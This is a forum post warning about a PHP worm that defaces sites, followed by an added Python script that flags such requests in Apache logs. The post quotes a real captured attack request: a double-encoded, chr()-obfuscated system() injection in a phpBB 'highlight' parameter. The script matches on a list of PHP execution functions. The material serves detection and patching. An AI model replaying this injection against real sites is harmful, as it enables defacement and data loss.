This worm can infect some of the web sites out there.
Check this link out... I don't think it's a hoax... It supposedly will deface forms and cause data loss...
http://www.dslreports.com/forum/rema...4374~mode=flat
**** The following quoted by Koitsu ****
Recent PHP security hole + worm.
If this forum had cross-posting capabilities, I'd be sticking this on the UNIX Forum as well.
Some of you may be familiar with the security hole present in PHP versions prior to 5.0.3 (for the 5.x series) and 4.3.10 (for the 4.x series). If not, this post should be enough reason for you to look into it, and upgrade your sites accordingly.
A few hours ago, one of my hosted users pointed me to their site, asking me "what was going on", since they had apparently been hacked. I took a look at their page, and sure enough, I was greeted with the following:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD><BODY bgcolor="#000000" text="#FF0000"><H1>This site is defaced!!!</H1><HR><ADDRESS><b>NeverEverNoSanity WebWorm generation 12.</b></ADDRESS></BODY></HTML>
Details showed me that the worm actually reiterates through the entire site and literally modifies all .php documents to contain the above HTML. All .php files will become 270 bytes, with the above content. The worm does not do backups of any sort -- your data WILL BE LOST if you are hit by this worm. Thankfully, we do daily backups.
Grepping our Apache logs, I managed to find the following, which looked quite suspicious (the forum here will probably chomp this, but it gives some idea of what's going on):
69.72.192.194 - - [20/Dec/2004:16:41:51 -0800] "GET /jeboard/viewtopic.php?p=29123&sid=7c8 *cbbb5e849216e8da69853439fb687&highlight=%2527%252 Esystem(chr(112)%252echr(101)%252echr(114 *)%252echr(108)%252echr(32)%252echr(45)%252echr(10 1)%252echr(32)%252echr(34)%252echr(111)%2 *52echr(112)%252echr(101)%252echr(110)%252echr(32) %252echr(79)%252echr(85)%252echr(84)%252e *chr(44)%252echr(113)%252echr(40)%252echr(62)%252e chr(109)%252echr(49)%252echr(104)%252echr *(111)%252echr(50)%252echr(111)%252echr(102)%252ec hr(41)%252echr(32)%252echr(97)%252echr(11 *0)%252echr(100)%252echr(32)%252echr(112)%252echr( 114)%252echr(105)%252echr(110)%252echr(11 *6)%252echr(32)%252echr(113)%252echr(40)%252echr(7 2)%252echr(89)%252echr(118)%252echr(57)%2 *52echr(112)%252echr(111)%252echr(52)%252echr(122) %252echr(51)%252echr(106)%252echr(106)%25 *2echr(72)%252echr(87)%252echr(97)%252echr(110)%25 2echr(78)%252echr(41)%252echr(34))%252e%2 *527 HTTP/1.0" 200 34847 "http://www.joyelectric.com/jeboard/viewtopic.php?p=29123&sid=7c8c *bbb5e849216e8da69853439fb687&highlight=%2527%252E system(chr(112)%252echr(101)%252echr(114) *%252echr(108)%252echr(32)%252echr(45)%252echr(101 )%252echr(32)%252echr(34)%252echr(111)%25 *2echr(112)%252echr(101)%252echr(110)%252echr(32)% 252echr(79)%252echr(85)%252echr(84)%252ec *hr(44)%252echr(113)%252echr(40)%252echr(62)%252ec hr(109)%252echr(49)%252echr(104)%252echr( *111)%252echr(50)%252echr(111)%252echr(102)%252ech r(41)%252echr(32)%252echr(97)%252echr(110 *)%252echr(100)%252echr(32)%252echr(112)%252echr(1 14)%252echr(105)%252echr(110)%252echr(116 *)%252echr(32)%252echr(113)%252echr(40)%252echr(72 )%252echr(89)%252echr(118)%252echr(57)%25 *2echr(112)%252echr(111)%252echr(52)%252echr(122)% 252echr(51)%252echr(106)%252echr(106)%252 *echr(72)%252echr(87)%252echr(97)%252echr(110)%252 echr(78)%252echr(41)%252echr(34))%252e%25 *27" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"(*) WARNING 1 long line(s) split
A Google Web search turned up nothing for "NeverEverNoSanity". Google Groups had a total of 3 or 4 posts about it, with ZERO details. Probably another IRC kiddie invention... *sigh*
A friend of mine in Sweden mentioned that in the past few hours he'd seen a couple sites he commonly visited as being hit by the worm in question.
Anyways, I'd just like to take a moment to mention this worm here, and state that yes, there is a mass worm going around defacing sites running versions of PHP, excluding the latest-and-greatest.
--
Making life hard for others since 1977.
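
Added example, not part of the original post or of Koitsu's message: a log triage script for the pattern in the Apache entry above, where the `highlight` parameter is URL-encoded twice (`%2527`) and hides its text in a `chr()` chain. The sample log lines are constructed (documentation addresses, inert `chr()` text), and the list of PHP function names is an assumption.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
# PHP functions that have no business appearing in a query string (assumed list).
CALL_RE = re.compile(r'\b(system|passthru|exec|shell_exec|eval|popen|fwrite)\s*\(', re.I)
CHR_RE = re.compile(r'chr\(\s*(\d{1,3})\s*\)', re.I)

def full_decode(value, max_rounds=5):
    """URL-decode repeatedly; return (decoded text, number of rounds that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m or '?' not in m.group(4):
        return None
    host, when, _method, target, status, _size = m.groups()
    path, query = target.split('?', 1)
    decoded, rounds = full_decode(query)
    call = CALL_RE.search(decoded)
    # Flag a function call, or a quote that only surfaces after double decoding.
    if not call and not (rounds >= 2 and "'" in decoded):
        return None
    # Rebuild the text hidden in the chr() chain so the analyst can read it.
    hidden = ''.join(chr(int(c)) for c in CHR_RE.findall(decoded) if int(c) < 256)
    return {'host': host, 'time': when, 'path': path, 'status': int(status),
            'rounds': rounds, 'call': call.group(1).lower() if call else None,
            'hidden': hidden}

# Constructed sample lines, not taken from any real log.
SAMPLE = [
    '192.0.2.10 - - [20/Dec/2004:16:40:02 -0800] "GET /board/viewtopic.php?t=12&highlight=php%20upgrade HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.77 - - [20/Dec/2004:16:41:51 -0800] "GET /board/viewtopic.php?p=1&highlight=%2527%252Esystem(chr(84)%252echr(69)%252echr(83)%252echr(84))%252e%2527 HTTP/1.0" 200 34847 "-" "Mozilla/4.0"',
]

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A status of 200 on a flagged request only means the page was served; whether the command ran has to be confirmed from file changes on disk, such as the 270-byte .php files described above.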